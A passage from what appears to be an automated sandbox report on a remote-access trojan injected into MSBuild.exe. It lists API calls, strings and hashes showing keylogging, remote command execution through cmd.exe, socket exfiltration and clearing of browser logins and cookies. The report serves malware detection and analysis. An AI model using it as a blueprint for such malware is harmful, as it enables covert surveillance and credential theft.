                                                                                                                        • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                        • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                                                        • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                        • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                                                        Function 0044F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 0044F7B5
                                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                        • _free.LIBCMT ref: 0044F7C7
                                                                                                                        • _free.LIBCMT ref: 0044F7D9
                                                                                                                        • _free.LIBCMT ref: 0044F7EB
                                                                                                                        • _free.LIBCMT ref: 0044F7FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                        • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                                        • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                        • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                                        Function 004432E7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00443305
                                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                        • _free.LIBCMT ref: 00443317
                                                                                                                        • _free.LIBCMT ref: 0044332A
                                                                                                                        • _free.LIBCMT ref: 0044333B
                                                                                                                        • _free.LIBCMT ref: 0044334C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                        • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                                        • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                        • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                                                        Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                                        • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                                        • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                                          • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                          • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                        • String ID: (FG
                                                                                                                        • API String ID: 3142014140-2273637114
                                                                                                                        • Opcode ID: ebe0a4eb5fde01a48d90012b115cc049424e40b4c1d84d5979612c145f060519
                                                                                                                        • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                                        • Opcode Fuzzy Hash: ebe0a4eb5fde01a48d90012b115cc049424e40b4c1d84d5979612c145f060519
                                                                                                                        • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                                        Function 0044D459 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _strpbrk.LIBCMT ref: 0044D4A8
                                                                                                                        • _free.LIBCMT ref: 0044D5C5
                                                                                                                          • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00000000,0000000A,0000000A,00000000,0041AD67,00000022,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                                                                                          • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043A878
                                                                                                                          • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                        • String ID: *?$.
                                                                                                                        • API String ID: 2812119850-3972193922
                                                                                                                        • Opcode ID: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                                                                                        • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                                                                                        • Opcode Fuzzy Hash: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                                                                                        • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                                                                                        Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                          • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                          • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                          • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                                        • String ID: XCG$`AG$>G
                                                                                                                        • API String ID: 2334542088-2372832151
                                                                                                                        • Opcode ID: cae74dba3d0bdf8ce2325287343af9926fac7638ec68cb4c548e08abd9503b01
                                                                                                                        • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                                        • Opcode Fuzzy Hash: cae74dba3d0bdf8ce2325287343af9926fac7638ec68cb4c548e08abd9503b01
                                                                                                                        • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                                        Function 004426D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 00442714
                                                                                                                        • _free.LIBCMT ref: 004427DF
                                                                                                                        • _free.LIBCMT ref: 004427E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                        • API String ID: 2506810119-4083458154
                                                                                                                        • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                                        • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                                        • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                                        • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                                        Function 00404468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92synchronizationnetworkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                        • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EventObjectSingleWaitsend
                                                                                                                        • String ID: LAL
                                                                                                                        • API String ID: 3963590051-3302426157
                                                                                                                        • Opcode ID: cd91422d9e85df6d743440515086c76da5eceecec014799576a9647d60b24de0
                                                                                                                        • Instruction ID: 68c7e6670e460543dd9c105572fcb78fed3a06f13f8c8b410ea91b680b50408d
                                                                                                                        • Opcode Fuzzy Hash: cd91422d9e85df6d743440515086c76da5eceecec014799576a9647d60b24de0
                                                                                                                        • Instruction Fuzzy Hash: 192143B29001196BDF04BBA5DC96DEE777CFF54358B00013EF916B21E1EA78A604D6A4
                                                                                                                        Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                                          • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                          • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                        • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                        • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                                        • API String ID: 368326130-2663660666
                                                                                                                        • Opcode ID: c3540001cb28e5241d08071bc8ad56e23143188ebe681c920b035d8da6777e22
                                                                                                                        • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                                                        • Opcode Fuzzy Hash: c3540001cb28e5241d08071bc8ad56e23143188ebe681c920b035d8da6777e22
                                                                                                                        • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                                                        Function 0040A876 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                        • wsprintfW.USER32 ref: 0040A905
                                                                                                                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EventLocalTimewsprintf
                                                                                                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                                        • API String ID: 1497725170-1359877963
                                                                                                                        • Opcode ID: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                                                        • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                                                        • Opcode Fuzzy Hash: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                                                        • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                                                        Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                        • String ID: Online Keylogger Started
                                                                                                                        • API String ID: 112202259-1258561607
                                                                                                                        • Opcode ID: 1a35105b2445a8ebc904048b9bfc8e08726f4dfb0f7c8d04cd20acbdd1743331
                                                                                                                        • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                                                        • Opcode Fuzzy Hash: 1a35105b2445a8ebc904048b9bfc8e08726f4dfb0f7c8d04cd20acbdd1743331
                                                                                                                        • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                                        Function 0044AA73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                                                        • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                                                        • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                        • String ID: `@
                                                                                                                        • API String ID: 2583163307-951712118
                                                                                                                        • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                        • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                                                        • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                        • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                                                        Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventHandleObjectSingleWait
                                                                                                                        • String ID: Connection Timeout
                                                                                                                        • API String ID: 2055531096-499159329
                                                                                                                        • Opcode ID: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                                                        • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                                                        • Opcode Fuzzy Hash: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                                                        • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                                                        Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                                          • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                                                          • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                        • String ID: bad locale name
                                                                                                                        • API String ID: 3628047217-1405518554
                                                                                                                        • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                                        • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                                                        • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                                        • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                                                        Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExecuteShell
                                                                                                                        • String ID: /C $cmd.exe$open
                                                                                                                        • API String ID: 587946157-3896048727
                                                                                                                        • Opcode ID: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                                        • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                        • Opcode Fuzzy Hash: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                                        • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                        Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                        • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                        • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: TerminateThread$HookUnhookWindows
                                                                                                                        • String ID: pth_unenc
                                                                                                                        • API String ID: 3123878439-4028850238
                                                                                                                        • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                        • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                                        • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                        • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                                        Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: GetLastInputInfo$User32.dll
                                                                                                                        • API String ID: 2574300362-1519888992
                                                                                                                        • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                                        • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                                                        • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                                        • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                                                        Function 00448D0B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1036877536-0
                                                                                                                        • Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                                        • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                                                        • Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                                        • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                                                        Function 00441A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                                        • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                                        • Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                                        • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                                                        Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                                        • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
